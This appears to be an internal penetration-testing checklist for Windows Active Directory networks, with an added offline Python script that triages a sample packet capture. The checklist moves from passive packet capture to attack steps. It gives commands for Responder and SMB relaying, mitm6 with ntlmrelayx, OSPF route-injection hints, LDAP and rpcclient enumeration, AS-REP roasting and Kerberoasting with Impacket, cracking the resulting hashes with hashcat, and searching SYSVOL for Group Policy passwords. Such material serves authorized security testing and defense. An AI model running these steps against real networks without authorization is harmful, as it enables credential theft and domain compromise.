Save a packet capture:
tcpdump -i <interface> -s0 -w pcapfile.pcap
Ctrl-C to stop after about 5 minutes. Read the capture back, excluding your own host and ARP noise, and look for interesting protocols:
tcpdump -r pcapfile.pcap 'not host <your IP address> and not arp'
Do you see LLMNR and NetBIOS (NBNS)? Responder and SMB relay.
DHCPv6 broadcasts? mitm6 and ntlmrelayx.
Make a note of the domain name found in the pcap (NBNS/LLMNR queries and DHCP options usually carry it); it is needed in the later steps of the Recon section.
Do you see routing protocols? If yes, scp the pcap over to your system and open it in Wireshark. OSPF is a good example: hellos should only appear on links to other routers, not on user subnet interfaces. Cisco OSPF sends hellos on every interface OSPF is enabled on and defaults to null authentication (AuType 0), so a host on that segment could form an adjacency and inject routes.
Also check the capture for HSRP hellos using the default plaintext authentication string 'cisco'.
Tcpdump filter for DHCPv6: tcpdump -i eth0 -n -vv '(udp port 546 or 547) or icmp6'
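As an added example (not part of the original notes), the triage described above can be scripted so the same checks run against every capture. The script below is standard-library only and runs offline: it constructs a small sample capture inline (addresses and payloads are made up), writes it as a classic pcap blob, then parses it back and labels each frame with the checklist finding it represents (LLMNR, NBNS, DHCPv6, OSPF with AuType 0, HSRP with the plaintext 'cisco' string). It assumes Ethernet II frames and IPv4/IPv6 headers without options or extension headers; checksums in the constructed frames are left at zero and are never validated. To run it against a real capture, replace `sample_capture()` with the bytes of your pcap file.

```python
"""Triage a pcap for the link-local protocols the recon checklist keys on.
Added example: standard library only, sample traffic is constructed inline."""
import struct
from collections import Counter

LLMNR_PORT, NBNS_PORT, HSRP_PORT, OSPF_PROTO = 5355, 137, 1985, 89
DHCPV6_PORTS = (546, 547)

# What each finding means for the next step of the checklist.
FOLLOW_UP = {
    'llmnr': 'Responder / SMB relay',
    'nbns': 'Responder / SMB relay',
    'dhcpv6': 'mitm6 + ntlmrelayx',
    'ospf-null-auth': 'OSPF hello with AuType 0 on this segment: inspect in Wireshark',
    'hsrp-default-auth': "HSRP hello with plaintext auth string 'cisco'",
}

def build_pcap(frames):
    """Serialize raw Ethernet frames as a classic little-endian pcap blob."""
    out = bytearray(struct.pack('<IHHiIII', 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1))
    for i, f in enumerate(frames):  # record header: ts_sec, ts_usec, incl_len, orig_len
        out += struct.pack('<IIII', i, 0, len(f), len(f)) + f
    return bytes(out)

def iter_frames(blob):
    """Yield the raw frames from a classic little-endian pcap blob."""
    if struct.unpack_from('<I', blob, 0)[0] != 0xa1b2c3d4:
        raise ValueError('only classic little-endian pcap is handled here')
    off = 24
    while off + 16 <= len(blob):
        incl = struct.unpack_from('<IIII', blob, off)[2]
        off += 16
        yield blob[off:off + incl]
        off += incl

def classify(frame):
    """Label one frame with the checklist finding it represents, or 'other'."""
    ethertype = struct.unpack_from('!H', frame, 12)[0]
    if ethertype == 0x0806:
        return 'arp'
    if ethertype == 0x0800:  # IPv4: protocol at header byte 9, IHL gives payload offset
        ihl = (frame[14] & 0x0f) * 4
        proto, payload = frame[14 + 9], frame[14 + ihl:]
        if proto == OSPF_PROTO:  # AuType is bytes 14..15 of the OSPF header; 0 = null auth
            return 'ospf-null-auth' if struct.unpack_from('!H', payload, 14)[0] == 0 else 'ospf'
        if proto == 17:  # UDP
            sport, dport = struct.unpack_from('!HH', payload, 0)
            if LLMNR_PORT in (sport, dport):
                return 'llmnr'
            if NBNS_PORT in (sport, dport):
                return 'nbns'
            if HSRP_PORT in (sport, dport):  # HSRPv0 auth data: bytes 8..15 of the UDP payload
                auth = payload[8:][8:16].rstrip(b'\x00')
                return 'hsrp-default-auth' if auth == b'cisco' else 'hsrp'
    elif ethertype == 0x86dd:  # IPv6: next header at byte 6, fixed 40-byte header
        nxt, payload = frame[14 + 6], frame[14 + 40:]
        if nxt == 17 and any(p in DHCPV6_PORTS for p in struct.unpack_from('!HH', payload, 0)):
            return 'dhcpv6'
    return 'other'

def triage(blob):
    """Count findings per label and attach the checklist follow-up for each."""
    counts = Counter(classify(f) for f in iter_frames(blob))
    return {label: (n, FOLLOW_UP.get(label, '')) for label, n in counts.items()}

# --- constructed sample traffic (made-up addresses, minimal payloads) --------
def eth(ethertype, payload, dst=b'\xff' * 6, src=b'\x00\x11\x22\x33\x44\x55'):
    return dst + src + struct.pack('!H', ethertype) + payload

def ipv4(proto, payload, src=b'\x0a\x00\x00\x05', dst=b'\x0a\x00\x00\xff'):
    return struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0, src, dst) + payload

def ipv6(nxt, payload, src=b'\xfe\x80' + b'\x00' * 13 + b'\x05', dst=b'\xff\x02' + b'\x00' * 13 + b'\x01'):
    return struct.pack('!IHBB16s16s', 0x60000000, len(payload), nxt, 64, src, dst) + payload

def udp(sport, dport, data):
    return struct.pack('!HHHH', sport, dport, 8 + len(data), 0) + data

def sample_capture():
    # OSPFv2 hello: version 2, type 1, length 44, router/area IDs, checksum 0, AuType 0, 8 auth bytes
    ospf_hello = struct.pack('!BBH4s4sHH8s', 2, 1, 44, b'\x0a\x00\x00\x01', b'\x00' * 4, 0, 0, b'') + b'\x00' * 20
    # HSRPv0 hello: version, opcode, state active(16), timers, priority, group, reserved, auth, virtual IP
    hsrp_hello = struct.pack('!BBBBBBBB8s4s', 0, 0, 16, 3, 10, 100, 1, 0, b'cisco', b'\x0a\x00\x00\x01')
    frames = [
        eth(0x0806, b'\x00' * 28),                                       # ARP, dropped by 'not arp'
        eth(0x0800, ipv4(17, udp(50000, LLMNR_PORT, b'\x00' * 20))),      # LLMNR name query
        eth(0x0800, ipv4(17, udp(NBNS_PORT, NBNS_PORT, b'\x00' * 50))),   # NBNS name query
        eth(0x86dd, ipv6(17, udp(546, 547, b'\x01' + b'\x00' * 10))),     # DHCPv6 Solicit
        eth(0x0800, ipv4(OSPF_PROTO, ospf_hello)),                        # OSPF hello, null auth
        eth(0x0800, ipv4(17, udp(HSRP_PORT, HSRP_PORT, hsrp_hello))),     # HSRP hello, auth 'cisco'
        eth(0x0800, ipv4(6, b'\x00' * 20)),                               # ordinary TCP, ignored
    ]
    return build_pcap(frames)

if __name__ == '__main__':
    for label, (n, todo) in sorted(triage(sample_capture()).items()):
        print(f'{label:18} {n:3}  {todo}')
```

The HSRP and OSPF checks look at the authentication fields directly rather than just the port or protocol number, because it is the null or default authentication, not the mere presence of the protocol, that makes the finding actionable.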
fierce -d <domain.name>
amass enum -ip -active -d example.com (older amass releases used amass -ip -active -d example.com without the enum subcommand)
With credentials:
Install: pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump
Enumerate: adidnsdump -r -u <domain>\\<username> <DC>
apt install avahi-utils
avahi-browse -a -v -r
Start in Analyze mode (passive)
./Responder.py -I <interface> -A
Do you see any obvious honeypot systems? If yes, blacklist them in the configuration before switching to an active attack.
Do you see LLMNR and NetBIOS (NBNS)? If yes, proceed to SMB Relaying.
If no, check your packet capture for DHCPv6. If found, proceed to SMB Relaying via mitm6 and ntlmrelayx.
ldapsearch -H ldap://<DC IP> -x -s base namingcontexts (older ldapsearch builds accept -h <DC IP> instead of -H; anonymous bind must be allowed for this to return anything)
First you'll need the domain name. You should be able to find that in the tcpdump output.
Next, run:
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g' > domaincontrollers.out
Using ldapsearch: ldapsearch -H ldap://<DC IP> -x -b "DC=htb,DC=local", replacing "DC=htb,DC=local" with the naming context returned by the namingcontexts query above.
If you get usernames, run Impacket GetNPUsers.py against them and crack any hashes you get back. The script requests TGTs for users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH); for each such user it prints the AS-REP in hashcat format by default, or John the Ripper format with -format john, so you can send it for cracking.
Using Impacket (no credentials, usernames from a file, one per line):
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -usersfile users.txt -no-pass -request
Crack hashes using Hashcat mode 18200 (krb5asrep).
Once you have credentials, run the CrackMapExec gpp_password and gpp_autologon modules (-M gpp_password, -M gpp_autologon against a DC) to search SYSVOL for passwords stored in Group Policy Preferences.
Interactive:
rpcclient -U "DOMAIN/username%password" <domain controller name or IP>
Common rpcclient commands (suffix to the above command):
-c dsr_enumtrustdom
-c enumdomains
-c enumdomusers
-c enumdomgroups
-c getdompwinfo
Windapsearch: https://github.com/ropnop/windapsearch (has a nice feature that resolves Domain Admins through nested group membership, which 'net group "Domain Admins" /domain' does not show).
Using Impacket:
GetUserSPNs.py -request -save -dc-ip <IP> domain/user
Crack hashes using Hashcat mode 13100 (krb5tgs).